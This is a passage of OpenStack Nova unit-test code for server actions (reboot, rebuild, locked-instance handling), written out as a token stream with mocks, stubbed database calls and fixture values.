name|'columns_to_join'
op|'='
name|'None'
op|','
nl|'\n'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'INSTANCE_IDS'
op|'['
name|'instance_uuid'
op|']'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'inst'
op|'='
name|'dict'
op|'('
name|'inst'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'return'
op|'('
name|'inst'
op|','
name|'inst'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|instance_update
dedent|''
name|'def'
name|'instance_update'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'INSTANCE_IDS'
op|'['
name|'instance_uuid'
op|']'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'return'
name|'inst'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|MockSetAdminPassword
dedent|''
name|'class'
name|'MockSetAdminPassword'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_id'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'password'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|__call__
dedent|''
name|'def'
name|'__call__'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'password'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_id'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'password'
op|'='
name|'password'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerActionsControllerTestV21
dedent|''
dedent|''
name|'class'
name|'ServerActionsControllerTestV21'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|variable|image_uuid
indent|' '
name|'image_uuid'
op|'='
string|"'76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'"
newline|'\n'
DECL|variable|image_base_url
name|'image_base_url'
op|'='
string|"'http://localhost:9292/images/'"
newline|'\n'
DECL|variable|image_href
name|'image_href'
op|'='
name|'image_base_url'
op|'+'
string|"'/'"
op|'+'
name|'image_uuid'
newline|'\n'
DECL|variable|servers
name|'servers'
op|'='
name|'servers_v21'
newline|'\n'
DECL|variable|validation_error
name|'validation_error'
op|'='
name|'exception'
op|'.'
name|'ValidationError'
newline|'\n'
DECL|variable|request_too_large_error
name|'request_too_large_error'
op|'='
name|'exception'
op|'.'
name|'ValidationError'
newline|'\n'
DECL|variable|image_url
name|'image_url'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ServerActionsControllerTestV21'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'group'
op|'='
string|"'glance'"
op|','
name|'api_servers'
op|'='
op|'['
string|"'http://localhost:9292'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake_host'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_update_and_get_original'"
op|','
nl|'\n'
name|'instance_update_and_get_original'
op|')'
newline|'\n'
nl|'\n'
name|'fakes'
op|'.'
name|'stub_out_nw_api'
op|'('
name|'self'
op|')'
newline|'\n'
name|'fakes'
op|'.'
name|'stub_out_compute_api_snapshot'
op|'('
name|'self'
op|'.'
name|'stubs'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'stub_out_image_service'
op|'('
name|'self'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'allow_instance_snapshots'
op|'='
name|'True'
op|','
nl|'\n'
name|'enable_instance_password'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_image_href'
op|'='
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'='
name|'self'
op|'.'
name|'_get_controller'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'compute_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
newline|'\n'
name|'self'
op|'.'
name|'req'
op|'='
name|'fakes'
op|'.'
name|'HTTPRequest'
op|'.'
name|'blank'
op|'('
string|"''"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'context'
op|'='
name|'self'
op|'.'
name|'req'
op|'.'
name|'environ'
op|'['
string|"'nova.context'"
op|']'
newline|'\n'
nl|'\n'
DECL|member|_get_controller
dedent|''
name|'def'
name|'_get_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ext_info'
op|'='
name|'extension_info'
op|'.'
name|'LoadedExtensionInfo'
op|'('
op|')'
newline|'\n'
name|'return'
name|'self'
op|'.'
name|'servers'
op|'.'
name|'ServersController'
op|'('
name|'extension_info'
op|'='
name|'ext_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_set_fake_extension
dedent|''
name|'def'
name|'_set_fake_extension'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
nl|'\n'
DECL|member|_rebuild
dedent|''
name|'def'
name|'_rebuild'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'image_ref'
op|','
name|'value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'value'
name|'is'
name|'not'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'rebuild'
op|'('
name|'context'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'image_ref'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'preserve_ephemeral'
op|'='
name|'value'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'rebuild'
op|'('
name|'context'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'image_ref'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_stub_instance_get
dedent|''
dedent|''
name|'def'
name|'_stub_instance_get'
op|'('
name|'self'
op|','
name|'uuid'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|')'
newline|'\n'
name|'if'
name|'uuid'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
dedent|''
name|'instance'
op|'='
name|'fake_instance'
op|'.'
name|'fake_db_instance'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'uuid'
op|'='
name|'uuid'
op|','
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'task_state'
op|'='
name|'None'
op|')'
newline|'\n'
name|'instance'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'.'
name|'_from_db_object'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'context'
op|','
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'compute_api'
op|'.'
name|'get'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'uuid'
op|','
nl|'\n'
name|'expected_attrs'
op|'='
op|'['
string|"'flavor'"
op|','
string|"'pci_devices'"
op|','
nl|'\n'
string|"'numa_topology'"
op|']'
op|','
nl|'\n'
name|'want_objects'
op|'='
name|'True'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'instance'
op|')'
newline|'\n'
name|'return'
name|'instance'
newline|'\n'
nl|'\n'
DECL|member|_test_locked_instance
dedent|''
name|'def'
name|'_test_locked_instance'
op|'('
name|'self'
op|','
name|'action'
op|','
name|'method'
op|'='
name|'None'
op|','
name|'body_map'
op|'='
name|'None'
op|','
nl|'\n'
name|'compute_api_args_map'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'body_map'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'body_map'
op|'='
op|'{'
op|'}'
newline|'\n'
dedent|''
name|'if'
name|'compute_api_args_map'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'compute_api_args_map'
op|'='
op|'{'
op|'}'
newline|'\n'
nl|'\n'
dedent|''
name|'instance'
op|'='
name|'self'
op|'.'
name|'_stub_instance_get'
op|'('
op|')'
newline|'\n'
name|'args'
op|','
name|'kwargs'
op|'='
name|'compute_api_args_map'
op|'.'
name|'get'
op|'('
name|'action'
op|','
op|'('
op|'('
op|')'
op|','
op|'{'
op|'}'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'getattr'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
name|'method'
op|')'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'instance'
op|','
nl|'\n'
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'controller_function'
op|'='
string|"'self.controller.'"
op|'+'
name|'action'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'eval'
op|'('
name|'controller_function'
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|','
nl|'\n'
name|'body'
op|'='
name|'body_map'
op|'.'
name|'get'
op|'('
name|'action'
op|')'
op|')'
newline|'\n'
comment|'# Do these here instead of tearDown because this method is called'
nl|'\n'
comment|'# more than once for the same test case'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'VerifyAll'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'UnsetStubs'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_actions_with_locked_instance
dedent|''
name|'def'
name|'test_actions_with_locked_instance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'actions'
op|'='
op|'['
string|"'_action_resize'"
op|','
string|"'_action_confirm_resize'"
op|','
nl|'\n'
string|"'_action_revert_resize'"
op|','
string|"'_action_reboot'"
op|','
nl|'\n'
string|"'_action_rebuild'"
op|']'
newline|'\n'
nl|'\n'
name|'method_translations'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
string|"'resize'"
op|','
nl|'\n'
string|"'_action_confirm_resize'"
op|':'
string|"'confirm_resize'"
op|','
nl|'\n'
string|"'_action_revert_resize'"
op|':'
string|"'revert_resize'"
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
string|"'reboot'"
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
string|"'rebuild'"
op|'}'
newline|'\n'
nl|'\n'
name|'body_map'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
op|'{'
string|"'resize'"
op|':'
op|'{'
string|"'flavorRef'"
op|':'
string|"'2'"
op|'}'
op|'}'
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
op|'{'
string|"'reboot'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'HARD'"
op|'}'
op|'}'
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
op|'{'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
string|"'adminPass'"
op|':'
string|"'TNc53Dr8s7vw'"
op|'}'
op|'}'
op|'}'
newline|'\n'
nl|'\n'
name|'args_map'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
op|'('
op|'('
string|"'2'"
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_confirm_resize'"
op|':'
op|'('
op|'('
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
op|'('
op|'('
string|"'HARD'"
op|','
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
op|'('
op|'('
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
string|"'TNc53Dr8s7vw'"
op|')'
op|','
op|'{'
op|'}'
op|')'
op|'}'
newline|'\n'
nl|'\n'
name|'for'
name|'action'
name|'in'
name|'actions'
op|':'
newline|'\n'
indent|' '
name|'method'
op|'='
name|'method_translations'
op|'.'
name|'get'
op|'('
name|'action'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
name|'method'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_test_locked_instance'
op|'('
name|'action'
op|','
name|'method'
op|'='
name|'method'
op|','
nl|'\n'
name|'body_map'
op|'='
name|'body_map'
op|','
nl|'\n'
name|'compute_api_args_map'
op|'='
name|'args_map'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard
dedent|''
dedent|''
name|'def'
name|'test_reboot_hard'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft
dedent|''
name|'def'
name|'test_reboot_soft'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_incorrect_type
dedent|''
name|'def'
name|'test_reboot_incorrect_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"NOT_A_TYPE"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_missing_type
dedent|''
name|'def'
name|'test_reboot_missing_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_none
dedent|''
name|'def'
name|'test_reboot_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
name|'None'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_not_found
dedent|''
name|'def'
name|'test_reboot_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'return_server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'str'
op|'('
name|'uuid'
op|'.'
name|'uuid4'
op|'('
op|')'
op|')'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_reboot_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_reboot
name|'def'
name|'fake_reboot'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'reboot'"
op|','
name|'fake_reboot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft_with_soft_in_progress_raises_conflict
dedent|''
name|'def'
name|'test_reboot_soft_with_soft_in_progress_raises_conflict'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard_with_soft_in_progress_does_not_raise
dedent|''
name|'def'
name|'test_reboot_hard_with_soft_in_progress_does_not_raise'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard_with_hard_in_progress
dedent|''
name|'def'
name|'test_reboot_hard_with_hard_in_progress'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING_HARD'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft_with_hard_in_progress_raises_conflict
dedent|''
name|'def'
name|'test_reboot_soft_with_hard_in_progress_raises_conflict'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING_HARD'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_rebuild_preserve_ephemeral
dedent|''
name|'def'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'self'
op|','
name|'value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_set_fake_extension'
op|'('
op|')'
newline|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'if'
name|'value'
name|'is'
name|'not'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'rebuild'"
op|']'
op|'['
string|"'preserve_ephemeral'"
op|']'
op|'='
name|'value'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_rebuild'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'_image_href'
op|','
name|'value'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_true
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_true'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_false
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_false'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_default
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_default'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_minimum
dedent|''
name|'def'
name|'test_rebuild_accepted_minimum'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
name|'self_href'
op|'='
string|"'http://localhost/v2/servers/%s'"
op|'%'
name|'FAKE_UUID'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'robj'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'body'
op|'='
name|'robj'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'adminPass'"
op|']'
op|')'
op|','
nl|'\n'
name|'CONF'
op|'.'
name|'password_length'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'robj'
op|'['
string|"'location'"
op|']'
op|','
name|'self_href'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_instance_with_image_uuid
dedent|''
name|'def'
name|'test_rebuild_instance_with_image_uuid'
op|'('
name|'self'
op|')'
